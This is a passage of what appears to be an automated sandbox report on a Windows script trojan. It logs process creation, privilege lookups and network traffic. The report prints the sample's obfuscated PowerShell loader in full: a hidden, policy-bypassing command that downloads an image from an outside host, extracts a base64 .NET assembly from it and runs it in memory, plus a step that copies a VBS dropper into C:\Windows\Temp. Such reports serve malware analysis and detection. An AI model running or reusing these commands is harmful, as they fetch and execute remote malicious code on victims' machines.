GtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 2104
thread_handle: 0x000002a4
process_identifier: 2228
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\regasm.vbs -Force }
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000330
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\regasm.vbs -Force }
filepath: powershell.exe
1 1 0

CreateProcessInternalW

thread_identifier: 2484
thread_handle: 0x00000438
process_identifier: 2476
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40Ni4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000043c
1 1 0
Kaspersky HEUR:Trojan.Script.Generic
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received [
Data received We: é OÓWãÁSñ¾ÀÇÇ»üښÐ*üDOWNGRD ÎdŽƒ¬±­9¼ ¬Häx)ÍVµ¶ÕЍ;€±šZÀ ÿ 
Data received Q
Data received ’
Data received ŽAb8¶R—UÝs25ïðLb`ðö±®}›ax1HBÌ1ßÙ¯!³«Ìæ ¡âÓß]MÅË$6ëŠÌcˆG0E!™Íۚ»]×¬ÒŽfll¢éß­*cyÈðŒ@*vz ,®ß"hœ“´Q‡»0x£l˜Ò©ȋQxÖåN‹rt­
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ¾†]½¾V|J Ád Žóàî™Sbýf8 Ö¿Ò;_†ƒÏ¾ :LNÛðþZ^xSDê
Data sent yue: ܧ€†—°ùFQ*ôôZ]­ä˜Í\lö ®¥­6:/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
Data sent FBA,.$Eôºáwá ҈c‡Ünê|Œ-4 °3Ýö¸µ4lžï…ÃÌþÒêH&¾;v} š0&•W~Í«?Ƌ0k 0·¸ß^~ÿ²{VCŠ9ص3ˆm?²û¦}ïÓ Û÷֟Ê"3y†¨éÇzɋ °q
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

send

buffer: yue: ܧ€†—°ùFQ*ôôZ]­ä˜Í\lö ®¥­6:/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
socket: 1424
sent: 126
1 126 0

send

buffer: FBA,.$Eôºáwá ҈c‡Ünê|Œ-4 °3Ýö¸µ4lžï…ÃÌþÒêH&¾;v} š0&•W~Í«?Ƌ0k 0·¸ß^~ÿ²{VCŠ9ص3ˆm?²û¦}ïÓ Û÷֟Ê"3y†¨éÇzɋ °q
socket: 1424
sent: 134
1 134 0

WSASend

buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 2012
0 0
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40Ni4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc'))"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\regasm.vbs -Force }
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceH